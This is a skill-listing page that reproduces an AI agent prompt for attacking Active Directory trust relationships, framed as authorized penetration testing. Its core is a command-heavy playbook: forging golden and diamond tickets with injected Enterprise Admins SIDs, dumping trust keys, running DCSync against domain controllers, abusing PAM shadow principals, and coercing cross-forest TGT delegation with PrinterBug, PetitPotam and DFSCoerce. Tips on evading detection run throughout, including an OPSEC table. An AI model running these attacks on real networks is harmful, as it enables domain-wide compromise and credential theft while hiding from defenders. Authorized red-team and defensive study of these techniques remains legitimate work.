Ad Environment Constraints
ADScanPro/Claude-AD
Real-world Active Directory environment constraints that silently break attacks when ignored: NTLM disabled (Kerberos fallback), AES-only KDCs (RC4 blocked by GPO), LDAP signing and channel binding…
Enumerates Active Directory trust relationships and exploits them for cross-domain and cross-forest privilege escalation.
$ npx skills add blacklanternsecurity/red-run --skill trust-attacks -a claude-codeProject install by default; add -g for ~/.claude/skills/.
$ gh skill install blacklanternsecurity/red-run trust-attacks --agent claude-codeProject scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).
$ git clone --depth 1 https://github.com/blacklanternsecurity/red-run.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/ad/trust-attacks .claude/skills/trust-attacks && rm -rf skills-srcUse ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.
Claude Code skills documentation · loads skills from .claude/skills/
Install the "trust-attacks" agent skill from https://github.com/blacklanternsecurity/red-run/tree/main/skills/ad/trust-attacks into .claude/skills/trust-attacks/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "trust-attacks", then confirm the skill loads.Claude Code copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$skill-installer install https://github.com/blacklanternsecurity/red-run/tree/main/skills/ad/trust-attacksType this inside Codex. $skill-installer <name> installs a curated skill from openai/skills. The installer writes to $CODEX_HOME/skills (default ~/.codex/skills). Restart Codex if the skill does not show up.
$ npx skills add blacklanternsecurity/red-run --skill trust-attacks -a codexProject install goes to .agents/skills/; add -g for ~/.codex/skills/.
$ gh skill install blacklanternsecurity/red-run trust-attacks --agent codexProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/blacklanternsecurity/red-run.git skills-src && mkdir -p .agents/skills && cp -r skills-src/skills/ad/trust-attacks .agents/skills/trust-attacks && rm -rf skills-srcUse ~/.agents/skills/ instead of .agents/skills for a personal install.
Codex skills documentation · loads skills from .agents/skills/
Install the "trust-attacks" agent skill from https://github.com/blacklanternsecurity/red-run/tree/main/skills/ad/trust-attacks into .agents/skills/trust-attacks/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "trust-attacks", then confirm the skill loads.Codex copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add blacklanternsecurity/red-run --skill trust-attacks -a cursorProject install goes to .agents/skills/; add -g for ~/.cursor/skills/.
$ gh skill install blacklanternsecurity/red-run trust-attacks --agent cursorProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/blacklanternsecurity/red-run.git skills-src && mkdir -p .cursor/skills && cp -r skills-src/skills/ad/trust-attacks .cursor/skills/trust-attacks && rm -rf skills-srcUse ~/.cursor/skills/ instead of .cursor/skills for a personal install.
Cursor skills documentation · loads skills from .cursor/skills/, .agents/skills/, .claude/skills/, .codex/skills/
Install the "trust-attacks" agent skill from https://github.com/blacklanternsecurity/red-run/tree/main/skills/ad/trust-attacks into .cursor/skills/trust-attacks/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "trust-attacks", then confirm the skill loads.Cursor copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gemini skills install https://github.com/blacklanternsecurity/red-run.git --path skills/ad/trust-attacks--scope user (default) or --scope workspace; --path is the subfolder of the repo that holds the skill; --consent skips the security confirmation prompt.
$ npx skills add blacklanternsecurity/red-run --skill trust-attacks -a gemini-cliProject install goes to .agents/skills/; add -g for ~/.gemini/skills/.
$ gh skill install blacklanternsecurity/red-run trust-attacks --agent gemini-cliProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/blacklanternsecurity/red-run.git skills-src && mkdir -p .gemini/skills && cp -r skills-src/skills/ad/trust-attacks .gemini/skills/trust-attacks && rm -rf skills-srcUse ~/.gemini/skills/ instead of .gemini/skills for a personal install, then run /skills reload.
Gemini CLI skills documentation · loads skills from .gemini/skills/, .agents/skills/
Install the "trust-attacks" agent skill from https://github.com/blacklanternsecurity/red-run/tree/main/skills/ad/trust-attacks into .gemini/skills/trust-attacks/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "trust-attacks", then confirm the skill loads.Gemini CLI copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gh skill install blacklanternsecurity/red-run trust-attacksInstalls for Copilot at project scope by default; add --scope user for a personal install. Preview a skill first with gh skill preview. Needs GitHub CLI 2.90.0 or later (public preview).
$ npx skills add blacklanternsecurity/red-run --skill trust-attacks -a github-copilotProject install goes to .agents/skills/; add -g for ~/.copilot/skills/.
$ git clone --depth 1 https://github.com/blacklanternsecurity/red-run.git skills-src && mkdir -p .github/skills && cp -r skills-src/skills/ad/trust-attacks .github/skills/trust-attacks && rm -rf skills-srcUse ~/.copilot/skills/ instead of .github/skills for a personal install. Commit .github/skills so cloud agent and code review can use it.
GitHub Copilot skills documentation · loads skills from .github/skills/, .claude/skills/, .agents/skills/
Install the "trust-attacks" agent skill from https://github.com/blacklanternsecurity/red-run/tree/main/skills/ad/trust-attacks into .github/skills/trust-attacks/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "trust-attacks", then confirm the skill loads.GitHub Copilot copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add blacklanternsecurity/red-run --skill trust-attacks -a opencodeOpenCode documents no install command of its own. Project install goes to .agents/skills/; add -g for ~/.config/opencode/skills/.
$ gh skill install blacklanternsecurity/red-run trust-attacks --agent opencodeProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/blacklanternsecurity/red-run.git skills-src && mkdir -p .opencode/skills && cp -r skills-src/skills/ad/trust-attacks .opencode/skills/trust-attacks && rm -rf skills-srcUse ~/.config/opencode/skills/ instead of .opencode/skills for a personal install.
OpenCode skills documentation · loads skills from .opencode/skills/, .claude/skills/, .agents/skills/
Install the "trust-attacks" agent skill from https://github.com/blacklanternsecurity/red-run/tree/main/skills/ad/trust-attacks into .opencode/skills/trust-attacks/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "trust-attacks", then confirm the skill loads.OpenCode copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
trust-attacksEnumerates Active Directory trust relationships and exploits them for cross-domain and cross-forest privilege escalation.
Trust Attacks is an agent skill from blacklanternsecurity/red-run. Enumerates Active Directory trust relationships and exploits them for cross-domain and cross-forest privilege escalation. Covers trust enumeration (nltest, PowerView, BloodHound), SID history injection (child domain to forest root via golden/diamond ticket with extra SIDs), inter-realm TGT forging using trust keys, TGT delegation coercion capture (Rubeus monitor + SpoolSample/DFSCoerce across forest trusts with ENABLETGTDELEGATION), cross-forest trust abuse (SID filtering bypass, RBCD, Kerberoasting via trust…
Its SKILL.md is about 4.5k tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts.
It sits in Security, covering Red teaming and adversary simulation and Penetration testing. The repository describes itself as: Offensive security toolkit for Claude Code. The licence is GPL-3.0.
7 steps, taken from the step headings in SKILL.md.
Read from SKILL.md and the folder at commit 050ac1f. It shows what the files ask for, not the result of running them.
Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.
From allowed-tools in the SKILL.md frontmatter.
Shell commands in SKILL.md call:
python3From the folder's file list and the shell code blocks in SKILL.md.
No URLs in SKILL.md.
From URLs in SKILL.md, links to its own repository left out.
Names no API keys, tokens, secrets or passwords.
From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.
Trust Attacks loads about 4.5k tokens when it runs. Until then it costs about 152 tokens; SKILL.md has 1,171 words of instructions outside code blocks.
Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.
The automated check noted patterns worth knowing about, such as sudo or a known installer.
NTLM. Fix requires root: `sudo ntpdate TARGET_DC`Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.
The full file from blacklanternsecurity/red-run at commit 050ac1f, republished under its GPL-3.0 licence (© blacklanternsecurity). 1,171 words, ~4,536 tokens.
.claude/skills/trust-attacks/SKILL.md (or your agent's skills folder).You are helping a penetration tester enumerate and exploit Active Directory trust relationships for cross-domain and cross-forest privilege escalation. All testing is under explicit written authorization.
Check for ./engagement/ directory. If absent, proceed without logging.
When an engagement directory exists:
[trust-attacks] Activated → <target> to the screen on activation.engagement/evidence/ with
descriptive filenames (e.g., sqli-users-dump.txt, ssrf-aws-creds.json).Call get_state_summary() from the state MCP server to read current
engagement state. Use it to:
Your return summary must include:
Access required: Domain Admin in at least one domain (for trust key extraction and krbtgt hash). Lower-privilege paths exist for trust account authentication.
Kerberos authentication setup (for enumeration and tool execution):
# Obtain TGT
getTGT.py 'DOMAIN.LOCAL/username:password' -dc-ip DC_IP
export KRB5CCNAME=$(pwd)/username.ccache
# All Impacket commands: -k -no-pass
# NetExec: --use-kcache
# bloodyAD: -kTools: Mimikatz, Rubeus, Impacket (ticketer.py, raiseChild.py, lookupsid.py, secretsdump.py, psexec.py), PowerView, bloodyAD, NetExec.
# Native Windows
nltest /trusted_domains
# PowerView — all trusts with properties
Get-DomainTrust
Get-DomainTrust -Domain parent.local
# AD Module — trust properties (critical for attack viability)
Get-ADTrust -Filter * -Properties SelectiveAuthentication,SIDFilteringQuarantined,SIDFilteringForestAware,TGTDelegation,ForestTransitive
# .NET — all trusts from current domain
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
# NetExec module
nxc ldap DC_IP -u 'user' -p 'pass' --use-kcache -M enum_trusts
# Impacket — enumerate SIDs in target domain
lookupsid.py -k -no-pass DOMAIN/user@DC_IP| Property | Impact |
|---|---|
SIDFilteringQuarantined | If False, SID history injection works across trust |
SelectiveAuthentication | If True, only explicitly allowed users can authenticate |
ForestTransitive | Indicates forest-level trust (broader scope) |
TrustDirection | Inbound/Outbound/Bidirectional — determines attack direction |
TGTDelegation | If True, unconstrained delegation possible across trust |
# Foreign group members (users from other domains in local groups)
Get-DomainForeignGroupMember
Get-DomainForeignGroupMember -Domain parent.local
# Foreign users with local admin
Get-NetLocalGroupMember -ComputerName dc.parent.localTrust Found
├── Parent-Child (in-forest) → SID filtering NOT enforced → Step 2 (SID History)
├── Forest Trust
│ ├── TGTDelegation = True + admin on trusted DC → Step 6 (TGT Delegation Coercion)
│ ├── SIDFilteringQuarantined = False → Step 2 (SID History cross-forest)
│ ├── SIDFilteringQuarantined = True → Step 3 (Trust Ticket) or Step 5 (enum only)
│ └── PAM trust attributes → Step 4 (Shadow Principals)
├── External Trust
│ ├── SIDFilteringQuarantined = False → Step 2 (SID History)
│ └── SIDFilteringQuarantined = True → Step 3 (Trust Ticket) + Step 5
└── One-Way Trust
├── Inbound (they trust us) → Step 3 (authenticate into their domain)
└── Outbound (we trust them) → Step 5 (limited attack surface)The primary trust escalation technique. Forge a ticket in the child domain with the parent domain's Enterprise Admins SID (S-1-5-21-PARENT-519) in the SID history field.
Prerequisite: krbtgt hash from child domain + parent domain SID.
# Child domain SID
lookupsid.py -k -no-pass CHILD.LOCAL/user@child-dc 0
# Parent domain SID + Enterprise Admins
lookupsid.py -k -no-pass CHILD.LOCAL/user@parent-dc | grep "Enterprise Admins"
# Note the SID before -519 as the parent domain SID# AES256 preferred — avoids RC4 detection
kerberos::golden /user:Administrator /domain:child.local /sid:S-1-5-21-CHILD_SID /aes256:<CHILD_KRBTGT_AES256> /sids:S-1-5-21-PARENT_SID-519 /startoffset:-10 /endin:600 /renewmax:10080 /ptt
# RC4 fallback
kerberos::golden /user:Administrator /domain:child.local /sid:S-1-5-21-CHILD_SID /rc4:<CHILD_KRBTGT_RC4> /sids:S-1-5-21-PARENT_SID-519 /pttUse /startoffset, /endin, /renewmax to match domain policy (avoid
default 10-year lifetime which is an obvious detection indicator).
Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512 /sids:S-1-5-21-PARENT_SID-519 /krbkey:<CHILD_KRBTGT_AES256> /nowrap /ldapDiamond ticket modifies a legitimate TGT — generates matching 4768->4769 event pairs (golden ticket skips the 4768).
# Generate ticket with extra SID
ticketer.py -nthash <CHILD_KRBTGT_NTLM> \
-domain child.local \
-domain-sid S-1-5-21-CHILD_SID \
-extra-sid S-1-5-21-PARENT_SID-519 \
Administrator
# Or with AES (preferred)
ticketer.py -aesKey <CHILD_KRBTGT_AES256> \
-domain child.local \
-domain-sid S-1-5-21-CHILD_SID \
-extra-sid S-1-5-21-PARENT_SID-519 \
Administrator
# Use the ticket
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass child.local/Administrator@parent-dc.parent.local
secretsdump.py -k -no-pass child.local/Administrator@parent-dc.parent.local# Full automation: extract krbtgt, get parent SID, forge ticket, authenticate
raiseChild.py -target-exec parent-dc.parent.local child.local/admin_user
# With Kerberos auth
raiseChild.py -k -no-pass -target-exec parent-dc.parent.local child.local/admin_userAutomatically: gets Enterprise Admins SID from parent, retrieves child krbtgt, creates golden ticket with extra SID, authenticates to parent DC, extracts parent admin credentials.
Windows Server 2025 DCs with PAC signature validation in enforcement mode
(CVE-2024-26248/29056) require valid cross-realm PAC signatures. Check
registry PacSignatureValidationLevel:
If enforcement mode is active, use trust ticket approach (Step 3) instead.
Forge an inter-realm TGT using the trust account key. Useful when:
# Mimikatz — dump trust keys from DC
lsadump::trust /patch
# Look for: [In] DOMAIN$ -> NTLM: <RC4>, AES256: <AES>
# Look for: [Out] DOMAIN$ -> NTLM: <RC4>, AES256: <AES>
# Alternative: DCSync the trust account
lsadump::lsa /inject /name:TARGETDOMAIN$# Impacket — DCSync trust account
secretsdump.py -k -no-pass DOMAIN/admin@dc | grep '\$'# Mimikatz — inter-realm TGT (referral ticket)
kerberos::golden /domain:source.local /sid:S-1-5-21-SOURCE_SID /rc4:<TRUST_RC4> /user:Administrator /service:krbtgt /target:target.local /ticket:trust.kirbi
# Request service ticket in target domain
Rubeus.exe asktgs /ticket:trust.kirbi /service:CIFS/dc.target.local /dc:dc.target.local /ptt# Authenticate as the trust account itself
Rubeus.exe asktgt /user:TARGETDOMAIN$ /domain:source.local /rc4:<TRUST_RC4> /dc:dc.source.local /ptt
# Now Kerberoast in target domain
Rubeus.exe kerberoast /domain:target.local# From Linux
getTGT.py -hashes :<TRUST_NTLM> source.local/TARGETDOMAIN\$
export KRB5CCNAME=TARGETDOMAIN\$.ccache
# Kerberoast via trust account
GetUserSPNs.py -k -no-pass -target-domain target.local source.local/TARGETDOMAIN\$PAM (Privileged Access Management) trusts use shadow security principals in a bastion forest to manage access to production forests. Compromising the bastion forest gives instant access to all managed forests.
Prerequisite: Windows Server 2016 or later. Trust with
ForestTransitive=True and SIDFilteringQuarantined=False.
# Find shadow principal configuration
Get-ADObject -SearchBase ("CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Filter * -Properties * | Select Name,member,msDS-ShadowPrincipalSid
# Example output:
# Name: forest-ShadowEnterpriseAdmin
# member: CN=PAMAdmin,CN=Users,DC=bastion,DC=local
# msDS-ShadowPrincipalSid: S-1-5-21-MANAGED_SID-519# Windows — add compromised user to shadow principal
Set-ADObject -Identity "CN=forest-ShadowEnterpriseAdmin,CN=Shadow Principal Configuration,CN=Services,CN=Configuration,DC=bastion,DC=local" -Add @{'member'="CN=compromised_user,CN=Users,DC=bastion,DC=local"}# Linux — bloodyAD (Kerberos auth)
bloodyAD --host bastion-dc -d bastion.local -k add groupMember \
'CN=forest-ShadowEnterpriseAdmin,CN=Shadow Principal Configuration,CN=Services,CN=Configuration,DC=bastion,DC=local' \
compromised_userResult: compromised user now has Enterprise Admin rights in all managed forests via the shadow principal SID mapping.
When SID filtering is enabled and direct escalation is blocked, use the trust account for reconnaissance in the target forest.
# Authenticate as trust account
getTGT.py -hashes :<TRUST_NTLM> source.local/TARGETDOMAIN\$
export KRB5CCNAME=TARGETDOMAIN\$.ccache
# Kerberoast in target domain
GetUserSPNs.py -k -no-pass -target-domain target.local source.local/TARGETDOMAIN\$ -outputfile trust-kerberoast.txtWhen you control a machine account in the trusted forest and have write access to a computer in the trusting forest:
# 1. Set RBCD on target in trusting forest
Set-ADComputer -Identity victim-host$ -PrincipalsAllowedToDelegateToAccount OURHOST$
# 2. Request inter-realm TGT
Rubeus.exe asktgt /user:OURHOST$ /domain:our.local /rc4:<RC4> /ptt
# 3. S4U impersonation
Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/victim-host.target.local /altservice:LDAP /ptt# BloodHound collection across trust
bloodhound-python -u 'user' -p 'pass' -d target.local -ns TARGET_DC_IP -c All
# LDAP queries into target domain
nxc ldap TARGET_DC -u 'user' -p 'pass' -d target.local --users
nxc ldap TARGET_DC -u 'user' -p 'pass' -d target.local --groupsWhen a forest trust has TGTDelegation = True (the CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION
flag), DCs in the trusting forest forward their full TGT when authenticating
cross-forest to DCs in the trusted forest. DCs have unconstrained delegation
by default — any DC in the trusted forest can harvest forwarded TGTs.
Prerequisites: Admin/SYSTEM on a DC in the trusted forest (the forest that receives authentication). Forest trust with TGTDelegation enabled.
See also: kerberos-delegation Step 2 covers unconstrained delegation TGT harvesting in same-domain context. This step applies the same technique cross-forest via the trust's TGT delegation flag.
# Rubeus — monitor for TGTs arriving via unconstrained delegation
# Run on the DC in the trusted forest (where you have admin)
Rubeus.exe monitor /interval:5 /nowrap /filteruser:TRUSTING_DC$Trigger the trusting forest DC to authenticate to the trusted forest DC. Critical: use the HOSTNAME of the trusted DC, not its IP. IP causes NTLM fallback which does not trigger TGT forwarding. The hostname forces Kerberos authentication, which triggers the TGT delegation.
# From any host with domain creds — coerce TRUSTING_DC → TRUSTED_DC
# Use HOSTNAME for listener (forces Kerberos, triggers TGT forwarding)
python3 printerbug.py DOMAIN/user@TRUSTING_DC TRUSTED_DC_HOSTNAME
python3 PetitPotam.py -u user -p 'password' -d DOMAIN TRUSTED_DC_HOSTNAME TRUSTING_DC
python3 dfscoerce.py -u user -d DOMAIN TRUSTED_DC_HOSTNAME TRUSTING_DCRubeus captures the trusting DC's machine TGT (e.g., DC01$). Convert and
use for DCSync:
# Convert .kirbi (base64 from Rubeus) → .ccache
ticketConverter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=ticket.ccache
# DCSync the trusting forest with the captured DC machine TGT
secretsdump.py -k -no-pass TRUSTING_DOMAIN/DC01\$@TRUSTING_DC_FQDN -just-dcSTOP and return to the orchestrator with:
Get-ADTrust -Properties SIDFilteringQuarantined.
If True on forest trust, SID history is stripped. Use trust ticket (Step 3)
or Kerberoasting via trust account (Step 5) instead.SelectiveAuthentication property.
If True, only explicitly allowed users can authenticate across the trust.lsadump::lsa /inject /name:DOMAIN$
or DCSync the trust account: secretsdump.py -k -no-pass domain/admin@dc.KRB_AP_ERR_SKEW): Clock Skew Interrupt — stop
immediately and return to the orchestrator. Do not retry or fall back to
NTLM. Fix requires root: sudo ntpdate TARGET_DC/etc/hosts entries
or configure DNS forwarding./etc/hosts entries for both DCs.nxc smb child-dc -k --use-kcache./ldap flag is included for PAC
attribute resolution. Use /tgtdeleg for automatic TGT acquisition./sids parameter is required for cross-domain
escalation — without it, the ticket is valid only in the current domain.| Technique | OPSEC | Detection | Notes |
|---|---|---|---|
| Trust enumeration | Low | Read-only LDAP queries | Standard recon |
| Diamond ticket + extra SID | Medium | 4768+4769 pair (normal) | Best for stealth |
| Golden ticket + extra SID | Medium-High | 4769 without 4768 | Detectable pattern |
| Inter-realm TGT (trust key) | Medium | Service ticket requests from trust account | Unusual but not alarming |
| Trust account Kerberoasting | Low-Medium | 4769 events | Offline cracking |
| raiseChild.py | High | Full chain (DCSync + ticket + auth) | Automated = fast but loud |
| PAM shadow principal modification | Medium | 5136 (object modification) | Bastion forest only |
| Cross-forest RBCD | Medium | S4U2Proxy events (4769) | Requires write access |
| TGT delegation coercion | Medium | 4624 + coercion RPC (4769 cross-forest) | Requires admin on trusted DC |
© blacklanternsecurity, GPL-3.0. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file
Just SKILL.md in skills/ad/trust-attacks of blacklanternsecurity/red-run.
Open the folder on GitHubat commit 050ac1f
Trust Attacks next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.
| Skill | Stars | Used in | Tokens | Auto-check | Licence | Repo updated |
|---|---|---|---|---|---|---|
| Trust Attacks this skillblacklanternsecurity/red-run | 286 | — | ~4.5k | Automated safety check: Notes | GPL-3.0 | |
| Ad Environment ConstraintsADScanPro/Claude-AD | 209 | — | ~2.9k | Automated safety check: Notes | MIT | |
| Adcs AttacksADScanPro/Claude-AD | 209 | — | ~3.6k | Automated safety check: Pass | MIT | |
| Coercion Ntlm RelayADScanPro/Claude-AD | 209 | — | ~1.9k | Automated safety check: Pass | MIT | |
| Kerberos AttacksADScanPro/Claude-AD | 209 | — | ~2.9k | Automated safety check: Notes | MIT | |
| Compliance MappingADScanPro/Claude-AD | 209 | — | ~1.7k | Automated safety check: Pass | MIT |
ADScanPro/Claude-AD
Real-world Active Directory environment constraints that silently break attacks when ignored: NTLM disabled (Kerberos fallback), AES-only KDCs (RC4 blocked by GPO), LDAP signing and channel binding…
ADScanPro/Claude-AD
Active Directory Certificate Services (AD CS) escalation techniques ESC1 through ESC17, driven by hand with Certipy (ly4k).
ADScanPro/Claude-AD
Authentication coercion (PetitPotam MS-EFSR, PrinterBug MS-RPRN, DFSCoerce MS-DFSNM) chained into NTLM relay (impacket ntlmrelayx) toward LDAP, AD CS web enrollment (ESC8), or SMB.
ADScanPro/Claude-AD
Kerberos-based Active Directory attacks driven by hand with standard tooling (Kerberoasting, AS-REP roasting, and delegation abuse: unconstrained, constrained/S4U, RBCD).
ADScanPro/Claude-AD
A high-level conceptual mapping from Active Directory attack techniques to the compliance controls they touch.
ohmyjahh/xquads-squads
Squad de 15 agentes de seguranca ofensiva e defensiva (Georgia Weidman, Peter Kim, Jim Manico, Chris Sanders, Omar Santos, Marcus Carey) cobrindo pentest, red team, blue team, AppSec, recon e…
blacklanternsecurity/red-run
Security-focused source code review. An agent skill from blacklanternsecurity/red-run.
blacklanternsecurity/red-run
Enumeration of infrastructure services: DNS, SMTP, SNMP, IPMI, NFS, TFTP, RPC/MSRPC, and HTTP/HTTPS surface detection.
blacklanternsecurity/red-run
Extracts and cracks Kerberos service tickets (Kerberoasting) and AS-REP hashes (AS-REP Roasting) for offline password recovery.
blacklanternsecurity/red-run
SMB share enumeration, access testing, password policy extraction, and content searching.
blacklanternsecurity/red-run
Bypass antivirus and EDR detection for payload delivery during exploitation.
Categories
Enumerates Active Directory trust relationships and exploits them for cross-domain and cross-forest privilege escalation. Trust Attacks is an agent skill from blacklanternsecurity/red-run. Enumerates Active Directory trust relationships and exploits them for cross-domain and cross-forest privilege escalation.
Trust Attacks fits situations like: tasks that involve Red teaming and adversary simulation; tasks that involve Penetration testing.
Run `npx skills add blacklanternsecurity/red-run --skill trust-attacks -a claude-code`. Or copy the skill folder (skills/ad/trust-attacks in blacklanternsecurity/red-run) into .claude/skills/trust-attacks in your project. Claude Code loads it when a task matches its description.
Run `npx skills add blacklanternsecurity/red-run --skill trust-attacks -a codex`. Or copy the skill folder (skills/ad/trust-attacks in blacklanternsecurity/red-run) into .agents/skills/trust-attacks in your project. Codex loads it when a task matches its description.
Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add blacklanternsecurity/red-run --skill trust-attacks -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/trust-attacks, .gemini/skills/trust-attacks, .github/skills/trust-attacks and .opencode/skills/trust-attacks in your project.
Going by SKILL.md and its folder, Trust Attacks needs the command-line tools its instructions call (python3).
SKILL.md contains no URLs. Any network use would come from the scripts or tools the agent runs. This is read from the text; nothing was executed.
Our automated static check of SKILL.md found notes only (runs commands with sudo), nothing it rates as a warning. It is not a guarantee. Review the folder before installing.
Trust Attacks is published under the GPL-3.0 licence (the repository's licence). It allows redistribution, so the full SKILL.md is shown on this page.
About 4.5k tokens (SKILL.md is roughly 18k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.
Skills that share tags, products or a category with Trust Attacks: Ad Environment Constraints (ADScanPro/Claude-AD, 209 stars), Adcs Attacks (ADScanPro/Claude-AD, 209 stars), Coercion Ntlm Relay (ADScanPro/Claude-AD, 209 stars) and Kerberos Attacks (ADScanPro/Claude-AD, 209 stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.
blacklanternsecurity (a GitHub organization) maintains it in blacklanternsecurity/red-run, which has 286 GitHub stars. The repository holds 6 skills in this directory. The repository was last updated on September 28, 2026.
Source: blacklanternsecurity/red-run on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.